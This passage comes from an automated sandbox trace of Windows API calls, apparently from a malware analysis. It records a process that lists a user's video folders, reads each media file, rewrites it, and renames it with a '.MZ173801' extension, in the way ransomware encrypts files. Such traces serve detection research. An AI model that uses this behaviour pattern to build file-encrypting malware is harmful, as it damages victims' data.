ftLastWriteTime.dwHighDateTime=0x1d5e167, nFileSizeHigh=0x0, nFileSizeLow=0x145fe, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="XpCaQ.mkv", cAlternateFileName="")) returned 1 [0120.812] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.813] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.813] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\XpCaQ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\xpcaq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3636fc0, ftCreationTime.dwHighDateTime=0x1d5eb81, ftLastAccessTime.dwLowDateTime=0xe78a9dc0, ftLastAccessTime.dwHighDateTime=0x1d5e167, ftLastWriteTime.dwLowDateTime=0xe78a9dc0, ftLastWriteTime.dwHighDateTime=0x1d5e167, nFileSizeHigh=0x0, nFileSizeLow=0x145fe)) returned 1 [0120.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.813] GetCurrentThreadId () returned 0x1358 [0120.814] GetCurrentThreadId () returned 0x1358 [0120.814] GetCurrentThreadId () returned 0x1358 [0120.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.814] GetCurrentThreadId () returned 0x1358 [0120.814] GetCurrentThreadId () returned 0x1358 [0120.814] GetCurrentThreadId () returned 0x1358 [0120.814] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\XpCaQ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\xpcaq.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.815] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.815] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.815] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x145fe [0120.815] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.815] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x145fe, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0x145fe, lpOverlapped=0x0) returned 1 [0120.816] CloseHandle (hObject=0x40c) returned 1 [0120.818] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\XpCaQ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\xpcaq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.819] WriteFile (in: hFile=0x40c, lpBuffer=0x23ba7d0*, nNumberOfBytesToWrite=0x145fe, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23ba7d0*, lpNumberOfBytesWritten=0x19f158*=0x145fe, lpOverlapped=0x0) returned 1 [0120.822] CloseHandle (hObject=0x40c) returned 1 [0120.824] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\XpCaQ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\xpcaq.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\XpCaQ.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\xpcaq.mkv.mz173801")) returned 1 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] GetCurrentThreadId () returned 0x1358 [0120.825] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3636fc0, ftCreationTime.dwHighDateTime=0x1d5eb81, ftLastAccessTime.dwLowDateTime=0xe78a9dc0, ftLastAccessTime.dwHighDateTime=0x1d5e167, ftLastWriteTime.dwLowDateTime=0xe78a9dc0, ftLastWriteTime.dwHighDateTime=0x1d5e167, nFileSizeHigh=0x0, nFileSizeLow=0x145fe, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="XpCaQ.mkv", cAlternateFileName="")) returned 0 [0120.825] GetLastError () returned 0x12 [0120.825] FindClose (in: hFindFile=0xa1bd58 | out: hFindFile=0xa1bd58) returned 1 [0120.825] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xa9498a92, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa9498a92, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bc40 [0120.825] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0120.825] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xa9498a92, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa9498a92, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a79310, ftCreationTime.dwHighDateTime=0x1d5e42d, ftLastAccessTime.dwLowDateTime=0x792f6dc0, ftLastAccessTime.dwHighDateTime=0x1d5e530, ftLastWriteTime.dwLowDateTime=0xa92a89b4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18354, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="6E4Yux.mp4.MZ173801", cAlternateFileName="6E4YUX~1.MZ1")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56d550, ftCreationTime.dwHighDateTime=0x1d5f070, ftLastAccessTime.dwLowDateTime=0x1112240, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0xa92ceb02, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x171df, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="9_dIdXhT.mp4.MZ173801", cAlternateFileName="9_DIDX~1.MZ1")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bbd2f0, ftCreationTime.dwHighDateTime=0x1d5e5e1, ftLastAccessTime.dwLowDateTime=0x25f86730, ftLastAccessTime.dwHighDateTime=0x1d5e484, ftLastWriteTime.dwLowDateTime=0xa9498a92, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1116, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="G e-i.swf.MZ173801", cAlternateFileName="GE-ISW~1.MZ1")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3636fc0, ftCreationTime.dwHighDateTime=0x1d5eb81, ftLastAccessTime.dwLowDateTime=0xe78a9dc0, ftLastAccessTime.dwHighDateTime=0x1d5e167, ftLastWriteTime.dwLowDateTime=0xa9498a92, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x145fe, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="XpCaQ.mkv.MZ173801", cAlternateFileName="XPCAQM~1.MZ1")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3636fc0, ftCreationTime.dwHighDateTime=0x1d5eb81, ftLastAccessTime.dwLowDateTime=0xe78a9dc0, ftLastAccessTime.dwHighDateTime=0x1d5e167, ftLastWriteTime.dwLowDateTime=0xa9498a92, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x145fe, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="XpCaQ.mkv.MZ173801", cAlternateFileName="XPCAQM~1.MZ1")) returned 0 [0120.826] GetLastError () returned 0x12 [0120.826] FindClose (in: hFindFile=0xa1bc40 | out: hFindFile=0xa1bc40) returned 1 [0120.826] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0x2dfb3250, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x2dfb3250, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="VmAilK6Ug", cAlternateFileName="VMAILK~1")) returned 1 [0120.826] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.826] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.826] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0x2dfb3250, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x2dfb3250, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bab8 [0120.827] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0x2dfb3250, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x2dfb3250, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0120.827] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72b6470, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x44b30c90, ftLastAccessTime.dwHighDateTime=0x1d5e75c, ftLastWriteTime.dwLowDateTime=0x44b30c90, ftLastWriteTime.dwHighDateTime=0x1d5e75c, nFileSizeHigh=0x0, nFileSizeLow=0x11182, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="7aB-vg.swf", cAlternateFileName="")) returned 1 [0120.827] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0120.827] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\7aB-vg.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\7ab-vg.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72b6470, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x44b30c90, ftLastAccessTime.dwHighDateTime=0x1d5e75c, ftLastWriteTime.dwLowDateTime=0x44b30c90, ftLastWriteTime.dwHighDateTime=0x1d5e75c, nFileSizeHigh=0x0, nFileSizeLow=0x11182)) returned 1 [0120.827] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBM